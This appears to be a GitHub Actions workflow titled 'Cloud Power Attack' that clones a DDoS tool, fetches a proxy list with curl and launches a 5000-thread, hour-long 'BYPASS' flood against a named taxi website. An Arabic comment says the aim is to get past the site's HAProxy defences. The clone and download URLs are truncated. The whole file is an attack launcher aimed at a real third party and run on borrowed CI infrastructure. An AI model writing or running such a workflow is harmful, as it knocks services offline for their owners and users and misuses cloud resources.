name: Cloud Power Attack
on: [workflow_dispatch]

jobs:
  attack_job:
    runs-on: ubuntu-latest
    steps:
      - name: Launch MHDDoS
        run: |
          git clone https://github.com
          cd MHDDoS
          pip3 install -r requirements.txt
          curl -o proxy.txt https://githubusercontent.com
          # تشغيل الهجمة بقوة سحابية (5000 Thread) لتجاوز HAProxy
          python3 start.py BYPASS https://a2ztaxi.uk 5 5000 proxy.txt 100 3600
